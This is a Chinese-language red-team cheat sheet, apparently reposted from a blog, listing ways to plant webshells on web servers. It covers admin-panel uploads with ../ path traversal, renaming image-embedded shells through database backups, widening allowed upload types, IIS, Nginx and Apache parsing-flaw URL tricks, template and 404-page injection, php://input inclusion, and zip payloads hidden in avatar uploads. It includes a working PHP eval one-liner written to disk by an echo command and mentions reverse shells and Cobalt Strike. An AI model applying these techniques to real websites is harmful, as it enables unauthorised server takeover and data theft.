常見GetShell


進后台getshell

管理員后台直接getshell

管理員后台直接上傳shell,有時候帶密碼的webshell連接時容易被WAF攔截,可以上傳不加密的webshell如有權限限制可以嘗試管理后台自帶的修改文件名功能在文件名前加../來穿越目錄,如上傳的文件為a.php,將a.php修改為../a.php

后台數據庫備份getshell

后台數據庫備份getshell,上傳圖片馬並獲取路勁,通過數據庫備份修改后綴名。如有后綴名無法修改或路徑無法修改可以修改前端代碼繞過。
image
上傳一個圖片后找到返回地址
image
將數據庫路徑填寫為圖片地址,而后修改名稱
image
而后直接去連接就可以

各類上傳getshell

https://www.cnblogs.com/SnowSec/p/14258452.html

修改網站上傳類型getshell

修改網站上傳類型,后台設置中添加aasps|asp|php|jsp|aspx|asa|cer,保存后上傳aasps文件,上傳后為asp文件可以解析Getshell
image

這張圖是某次HVV時的,后台可以修改上傳類型,若不改類型,服務器后端白名單校驗,繞過較為復雜,所以直接在前台修改。

上傳其他腳本類型Getshell

一台服務器有多個站,比如端口不同開了不同的站,a網站為asp腳本,b網站為php腳本,而a中限制了上傳類型為asp的文件,此時可以上傳php的腳本,來拿shell;也可以把后綴名改為asa或者后面加個.如xx.asp.來突破文件類型進行上傳1來getshell

解析漏洞getshell

IIS 6.0解析漏洞

http://www.xxx.com/xx.asp/xx.jpg
http://www.xxx.com/xx.asp/xx.txt
http://www.xxx.com/xx.asp/xx.asp;jpg

IIS7.0/7.5、Nginx<8.0解析漏洞

http://www.xxx.com/xx.jpg/.php

Nginx<8.03空字節代碼執行漏洞

http://www.xxx.com/xx.jpg.php

Apache解析漏洞

http://www.xxx.com/xx.php.owf.rar 逆向解析,直到解析出php為止

編輯器Getshell

傳送門:https://navisec.it/編輯器漏洞手冊/

網站配合插馬Getshell

進入后台,網站配置插馬getshel,直接自定義網站模板,生成一個模板,然后getshell
image

修改腳本文件進行getshell

修改后台腳本文件插入一句話直接getshell,盡量插在頭尾
上傳插件,更新頁面Getshell
wordpres,dz等,如編輯wordpress404頁面插入一句話,可以先下載對應版本找到404路徑,部分OA上傳插件Getshell,jboss,tomcat等上傳war包getshell等;

執行SQL語句寫入Getshell

首先執行錯誤的SQL語句,使其暴露出網站的根目錄,以ecshop為例,進入后台執行SQL查詢
SQL語句getshell的之前打靶場分析過一些https://www.cnblogs.com/SnowSec/p/14747447.html

命令執行Getshell

Windows

echo <?php @eval($_POST[C0cho]);?> >c:\1.php

Linux

echo -e "" > 1.php
Linux需要在$前加\進行防轉義,Windows需要在<前加^防轉義,Windows和Linux中的 “可以使用’或不使用進行嘗試

文件包含Getshell

asp包含

include file="123.jpg"調用的文件必須和被調用的文件在同一目錄,否則找不到,如果不在同一目錄,用下面語句也使用如下代碼include virtual="文件所在目錄/123.jpg"

php包含

使用php://input

使用burpsuite截取數據包,並修改內容轉發(還可以使用hackbar工具中的post data中輸入2222')?>等一句話木馬)

不進后台Getshell

0day Getshell

各類OA,coremail,cms,php框架,數據庫,java框架0day,1day,ndaygetshell
1day來getshell還是比較理想的,可能還未及時修復然后去利用

上傳會員頭像Getshell

將Webshell放入文件夾,然后壓縮成zip文件。上傳正常頭像抓包將圖片文件內容刪除,burp右鍵選擇文件黏貼功能,將zip包內容復制到burp中的圖片內容,放行后菜刀連接圖片上傳路徑下的文件夾(zip壓縮包名)下的Webshell

遠程命令執行

Linux/Windows反彈shell,腳本語言、powershell反彈shell,Kali/Cobalt Strike等各種上線方法
用友前段時間的RCE我在兩次HVV中都有找到利用點;還是多關注一些OA,這些的漏洞並及時復現

其他漏洞Getshell

XXE,SSRF,反序列化,strust2等一種或多種組合利用Getshell


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM